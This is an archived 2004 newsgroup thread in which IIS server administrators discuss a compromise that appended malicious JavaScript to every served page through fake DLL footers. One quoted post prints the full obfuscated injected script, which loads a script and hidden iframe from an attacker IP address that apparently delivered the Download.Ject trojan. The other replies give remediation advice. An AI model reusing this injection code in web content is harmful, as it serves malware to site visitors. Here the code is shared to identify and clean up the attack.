Re: Russian IIS hack? Malicious Javascript code
From: Jeff Cochran (jeff.nospam_at_zina.com)
Date: 06/24/04
- Next message: Jeff Cochran: "Re: Webserver accessing Active Directory information"
- Previous message: Jeff Cochran: "Re: Can't access anything"
- In reply to: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
- Next in thread: Wes Carberry: "Re: Russian IIS hack? Malicious Javascript code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 23 Jun 2004 22:24:07 GMT
On 23 Jun 2004 14:00:35 -0700, rong@youngsinc.com (Ron Guyor) wrote:
>I've got the exact same problem here, same ip address, same footer
>getting added. How did you remove it?
>
>It's redirecting as a pop up which installs the Download.Ject trojan.
>Luckily most of my users have Symantec AV installed and it caught it,
>but now I'm trying to clean up and lock down my server.
>
>If you could give me some tips on removing the offending code, it
>would be most appreciated.
I think he said it was a footer in the IIS config for the web site.
Jeff
>Paul Lynch <paul.lynch@nospam.com> wrote in message news:<gumhd01faq0m59akfr4pkfshprhqo5no4d@4ax.com>...
>> On Tue, 22 Jun 2004 17:42:01 -0700, Oca Hoeflein <Oca
>> Hoeflein@discussions.microsoft.com> wrote:
>>
>> >I successfully removed some malicious code from my IIS 5.0 server that may not have had all it's patches updated, but I cannot find any information on this malicious code that redirected on a random basis the users of my websites to a russian website that appeared to be down. to a domain called balamut.com
>> >with an IP address of 217.107.218.147 which RDNS to
>> >unassigned.m10-msk-ru.e-neverland.net
>> >
>> >The javascript code lived in some fake dll files in the inetsrv folder.
>> >One fake .dll file was created for each web on my server and in the IIS metabase the defaultdocfooter was set to each of the dll files and enabledocfooter was set to true.
>> >
>> >the offending code was embedded in every file that the website delivered and pages that had embedded .js files the javascript for those pages would not function.
>> >
>> >I have posted the offending code, mabye someone can identify this?
>> >
>> >As proof check out a google search for one of the function in the code okx12()
>> >
>> >you'll see the first link it returns is an RTF if you view the html version you'll see this code appended to the bottom of the page.
>> >
>> ><script language="JavaScript"><!--
>> >var qxco7=document.cookie;function gc099(n21){var
>ix=qxco7.indexOf(n21+"=");if(ix==-1)return
>null;ix=qxco7.indexOf("=",ix)+1;var
>es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return
>unescape(qxco7.substring(ix,es));}function sc088(n24,v8){var today=new
>Date();var expiry=new
>Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+";
>expires="+expiry.toGMTString();qxco7=document.cookie;}function
>okx12(){window.status="";setTimeout("okx12()",
>200);}okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null){document.write("<script
>language=\"JavaScript\"
>src=\"http://217.107.218.147/dot.php\"></script><iframe
>src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\"
>scrolling=\"no\" frameborder=\"no\"/>");sc088("trk716","4");}}//
>--></script>
>> >
>>
>> You're asking the wrong questions I'm afraid. Instead of trying to
>> track down the source of some l33t hAx0r code you should be asking
>> yourself 'how did this stuff get onto my server and what can I do to
>> secure my server and stop it happening again ?'
>>
>> I'd suggest you start here :
>>
>> http://securityadmin.info/faq.asp#hackerstoc
>>
>>
>> Regards,
>>
>> Paul Lynch
>> MCSE
- Next message: Jeff Cochran: "Re: Webserver accessing Active Directory information"
- Previous message: Jeff Cochran: "Re: Can't access anything"
- In reply to: Ron Guyor: "Re: Russian IIS hack? Malicious Javascript code"
- Next in thread: Wes Carberry: "Re: Russian IIS hack? Malicious Javascript code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
